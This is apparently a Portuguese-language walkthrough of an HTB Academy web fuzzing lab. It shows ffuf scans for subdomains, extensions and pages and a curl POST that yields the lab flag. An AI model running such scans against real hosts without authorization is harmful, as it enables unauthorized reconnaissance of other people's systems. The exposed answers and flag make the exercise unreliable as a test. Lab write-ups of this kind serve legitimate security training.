Skills Assessment - Web Fuzzing
Execute uma varredura de difusão de subdomínio/vhost em '*.academy.htb' para o IP mostrado acima. Quais são todos os subdomínios que você pode identificar? (Escreva apenas o nome do subdomínio)
sudo sh -c 'echo " 94.237.52.105 academy.htb " >> /etc/hosts'$ ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:56405/ -H 'Host: FUZZ.academy.htb' -fs 985
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://academy.htb:56405/
:: Wordlist : FUZZ: /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.academy.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 985
________________________________________________
test [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8ms]
archive [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8ms]
faculty [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6ms]
:: Progress: [4997/4997] :: Job [1/1] :: 645 req/sec :: Duration: [0:00:04] :: Errors: 0 ::Antes de executar a varredura de difusão de página, você deve primeiro executar uma varredura de difusão de extensão. Quais são as diferentes extensões aceitas pelos domínios?
sudo sh -c 'echo " 94.237.52.105 academy.htb test.academy.htb archive.academy.htb faculty.academy.htb" >> /etc/hosts' ffuf -w /usr/share/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://faculty.academy.htb:56405/indexFUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://faculty.academy.htb:56405/indexFUZZ
:: Wordlist : FUZZ: /usr/share/SecLists/Discovery/Web-Content/web-extensions.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.phps [Status: 403, Size: 287, Words: 20, Lines: 10, Duration: 3951ms]
.php7 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4959ms]
.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4961ms]
:: Progress: [39/39] :: Job [1/1] :: 7 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
Uma das páginas que você identificar deverá dizer 'Você não tem acesso!'. Qual é o URL da página completa?
$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:56405/courses/FUZZ.php7Tente confundir os parâmetros que você identificou para valores de trabalho. Um deles deverá retornar uma bandeira. Qual é o conteúdo da bandeira?
$ curl http://faculty.academy.htb:56405/courses/linux-security.php7 -X POST -d 'username=harry' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
<div class='center'><p>HTB{w3b_fuzz1n6_m4573r}</p></div>
<html>
<!DOCTYPE html>
<head>
<title>HTB Academy</title>
Last updated